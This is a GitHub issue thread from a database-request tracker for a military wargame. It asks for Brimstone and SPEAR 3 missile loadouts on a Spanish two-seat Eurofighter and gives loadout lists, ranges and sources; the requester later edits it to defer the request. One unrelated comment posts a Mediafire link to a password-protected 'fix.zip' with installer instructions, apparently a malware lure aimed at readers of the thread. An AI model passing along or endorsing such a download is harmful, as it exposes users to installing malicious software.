### ISSUE TITLE
Request for Brimstone and SPEAR3 for spanish eurofighter (two seater AESA radar variant)

### ISSUE THREAD

**Issue by Martin11258** [PygmalionOfCyprus/cmo-db-requests#4965]
### DB Selector

DB3K

### User(s)

#5508 EF2000 Eurofighter Typhoon Two-Seater [C.16B] - 2022, Tranche 4, Project Halcon

### Weapons Carried

- 2x IRIS-T - 6x Brimstone - 2x Meteor(Optional) - 1x Litening III/EF - 2x 1000 liter drop tank

- 2x IRIS-T - 6x Brimstone - 2x Meteor(Optional) - 2x GBU-48 1x Litening III/EF - 2x 1000 liter drop tank

- 2x IRIS-T - 6x SPEAR 3 - 2x Meteor(Optional) - 1x Litening III/EF - 2x 1000 liter drop tank

- 2x IRIS-T - 12x SPEAR 3 - 2x Meteor(Optional) - 1x Litening III/EF

- 2x IRIS-T - 6x Brimstone - 2x AMRAAM-C7(Optional) - 1x Litening III/EF - 2x 1000 liter drop tank

- 2x IRIS-T - 6x Brimstone - 2x AMRAAM-C7(Optional) - 2x GBU-48 1x Litening III/EF - 2x 1000 liter drop tank

- 2x IRIS-T - 6x SPEAR 3 - 2x AMRAAM-C7(Optional) - 1x Litening III/EF - 2x 1000 liter drop tank

- 2x IRIS-T - 12x SPEAR 3 - 2x AMRAAM-C7(Optional) - 1x Litening III/EF

### Requires Buddy Illumination

No

### Default Combat Radius (nm)

1280 (700 for the 12 SPEAR 3)

### Weather Restrictions

All-Weather

### Time-of-Day Restrictions

Day & Night

### Capable of Quick Turnaround

Yes

### Comments

EDIT: The brimstone integration has been delay until the new eurofighters are deliver in 2028. The new halcon II will be the first spanish eurofighters to have the brimstone. As such, I have open a new request to add the 2028 variant with the brimstone (https://github.com/PygmalionOfCyprus/cmo-db-requests/issues/6412 and https://github.com/PygmalionOfCyprus/cmo-db-requests/issues/6413 ) I think is best to dont add the brimstone and spear to the 2021 P2eB and 2022 Halcon I for now
Source: https://www.infodefensa.com/texto-diario/mostrar/5114883/claves-programa-halcon-ii-eurofighter-tranche-4-partir-2030-radar-escan-misiles-brimstone-meteor

Request to add the brimstone and the SPEAR 3 to the Spanish eurofighters

For the loadouts I have used those of the British Eurofighter, the same with the range
I have made loadouts with amraam and meteor as spain have a very small amount of meteor(100) and mostly uses amraam C7

There are 4 different loadout tickets since Spain operates one seater and two seater, both with their versions of mechanical radar and AESA (since Spain does not plan to update its entire fleet to AESA, a portion of the aircraft will remain with mechanical radars)
In summary, the aircraft that would carry these new loadouts are #3229 #5507 #3629 #5508

### Sources

Spain buys brimstone
https://www.defensa.com/espana/espana-aprueba-compra-misiles-aim-120-c7-nsm-brimstone-para-472

Spain buys Brimstone and SPEAR 3 support structures and maintenance in NSPA
https://eportal.nspa.nato.int/eProcurement5G/Opportunities/Opportunities/RequestForProposalDetails/O_w5xycGMD8coDaox3vhig
![GRglFjZWAAEj6SE_1](https://github.com/user-attachments/assets/ae7efa6c-1dab-42fa-8b50-767825f78fcb)
![GK0A-MUXkAADnL0](https://github.com/user-attachments/assets/38d6ba8c-83bf-4e1e-9a8e-39a5a4046968)
![GRgmBIdXAAAP3ar_1](https://github.com/user-attachments/assets/6cc0c3c1-7fa4-4e9b-a2b3-ef3543c8b122)

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by KLABDB3K** [comment]
https://github.com/PygmalionOfCyprus/cmo-db-requests/issues/2630

**Comment by Martin11258** [comment]
EDIT: The brimstone integration has been delay until the new eurofighters are deliver in 2028. The new halcon II will be the first spanish eurofighters to have the brimstone. As such, I have open a new request to add the 2028 variant with the brimstone (#6412 and #6413 ) I think is best to dont add the brimstone and spear to the 2021 P2eB and 2022 Halcon I for now
Source: https://www.infodefensa.com/texto-diario/mostrar/5114883/claves-programa-halcon-ii-eurofighter-tranche-4-partir-2030-radar-escan-misiles-brimstone-meteor
